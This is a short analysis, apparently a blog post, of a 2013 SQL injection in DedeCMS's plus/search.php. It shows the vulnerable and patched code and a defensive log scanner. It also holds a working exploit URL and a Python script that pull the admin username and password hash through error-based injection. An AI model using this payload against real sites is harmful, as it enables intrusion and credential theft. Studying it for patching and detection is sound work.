DedeCMS search injection: a brief analysis

DedeCMS 2013-01-15 search **injection vulnerability**

Vulnerability discovered by: 鬼哥

20130115 **Routine security update**

include/arc.searchview.class.php: improved the accuracy of the search function
member/myfriend_group.php: fixed a security issue in the member-centre friend-group function
plus/search.php: fixed a security issue in the search function


Vulnerable file

/plus/search.php

The exploit below supplies `typeArr` through the query string, so the request parameter reaches the script as a PHP variable. With `keyword=11` and `typeArr[<key>]=1`, `str_replace('1', ' ', '11')` changes the keyword, the branch is taken, and the array key `$id` is copied into `$typeid` without any filtering.

```php
// Load the category-name cache and check whether the keyword contains a category name
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
{
    foreach($typeArr as $id=>$typename)
    {
        $keywordn = str_replace($typename, ' ', $keyword);
        if($keyword != $keywordn)
        {
            $keyword = $keywordn;
            $typeid = $id;  // $id is used without any filtering, which leads to the injection
            break;
        }
    }
}
} // closes an enclosing block that is not shown in this excerpt
$keyword = addslashes(cn_substr($keyword,30));
```

Patched version:

```php
// Load the category-name cache and check whether the keyword contains a category name
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
{
    foreach($typeArr as $id=>$typename)
    {
        //$keywordn = str_replace($typename, ' ', $keyword);
        $keywordn = $keyword;
        if($keyword != $keywordn)
        {
            $keyword = HtmlReplace($keywordn); // anti-XSS
            $typeid = intval($id); // force to an integer
            break;
        }
    }
}
} // closes an enclosing block that is not shown in this excerpt
$keyword = addslashes(cn_substr($keyword,30));
```
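Note that with `$keywordn = $keyword;` the comparison `$keyword != $keywordn` can never be true, so the patched branch is dead code; what actually closes the hole is that `$typeid` is now only ever assigned through `intval()`. The following is an added example written for this analysis, not DedeCMS code. It approximates PHP's `intval()` so you can see what a hostile `typeArr[...]` key collapses to after the patch, and it scans constructed web-server access-log lines (not real traffic) for requests whose `typeArr[...]` key is not a plain integer, which is the shape any request against the unpatched code had to take. The function names, the regexes and the sample log lines are all assumptions of this example.

```python
"""Defender-side checks for the plus/search.php typeArr issue described above.

Added example, not DedeCMS code.  Two things are shown:
1. what PHP's intval() (the fix applied to $typeid) collapses a hostile
   typeArr[...] key to;
2. a scan over constructed access-log lines that flags requests whose
   typeArr[...] key is not a plain integer.
"""
import re
from urllib.parse import unquote, urlsplit

# typeArr[<key>]=... as it appears in a raw query string; the key is group 1.
TYPEARR_KEY = re.compile(r'typeArr\[([^\]]*)\]', re.IGNORECASE)
# Request line inside a common/combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def php_intval(value: str) -> int:
    """Approximate PHP intval() on a string: optional whitespace and sign,
    then leading digits; a string with no leading digits becomes 0."""
    m = re.match(r'\s*([+-]?\d+)', value)
    return int(m.group(1)) if m else 0


def typearr_keys(request_uri: str) -> list:
    """Percent-decoded typeArr[...] keys found in the URI's query string."""
    query = urlsplit(request_uri).query
    return [unquote(k) for k in TYPEARR_KEY.findall(query)]


def suspicious_typearr_keys(request_uri: str) -> list:
    """Keys that are anything other than a plain integer.  A legitimate
    category id is digits only; anything else could only have mattered
    on the unpatched code."""
    return [k for k in typearr_keys(request_uri) if not re.fullmatch(r'\d+', k)]


def scan_access_log(lines):
    """Return (client_ip, offending_keys) for every log line whose request
    carries a non-integer typeArr key."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_typearr_keys(m.group(1))
        if bad:
            hits.append((line.split(' ', 1)[0], bad))
    return hits


# Constructed sample log lines (not real traffic).  The second one replays the
# request made by the exploit script on this page, URL-encoded as a browser sends it.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jan/2013:10:01:02 +0800] "GET /plus/search.php?keyword=test&typeArr[3]=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [15/Jan/2013:10:01:07 +0800] "GET /plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT%201%20FROM%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20dede_admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 200 1307',
    '10.0.0.7 - - [15/Jan/2013:10:02:00 +0800] "GET /index.php HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    for ip, keys in scan_access_log(SAMPLE_LOG):
        for k in keys:
            print(f"{ip}: typeArr key {k!r} -> intval() gives {php_intval(k)}")
```

The scan keys on the request, not the response: the error-based technique returns HTTP 200 with the MySQL "Duplicate entry" text in the page body, which is exactly what the page's own script greps for, so a status-code filter alone sees nothing. Suppressing database error output in production removes that channel even where a parameter still reaches a query unfiltered.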

Exploit URL (the `*` characters were eaten by the page's markup; restored from the URL-encoded form in the script below):

```
http://site/plus/search.php?keyword=11&typeArr[`@'`and(SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f) from %23@__admin Limit 0,1))a from information_schema.tables group by a)b)]=1
```

Python exploit:

```python
#!/usr/bin/env python
#coding=utf-8
# By 花开、若相惜 Pax.Mac Team
import urllib2, re

req=urllib2.Request("http://localhost/DedeCMS-V5.7-GBK-SP1/uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT%201%20FROM%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20dede_admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1")
res = urllib2.urlopen(req)
html = res.read()
print html
# The error-based payload surfaces the result inside MySQL's "Duplicate entry" message
html = re.findall(r"Duplicate entry \'\w+'", html)
if html:
    print "success"
    print html[0]
else:
    print "no sql injection"
res.close()
```
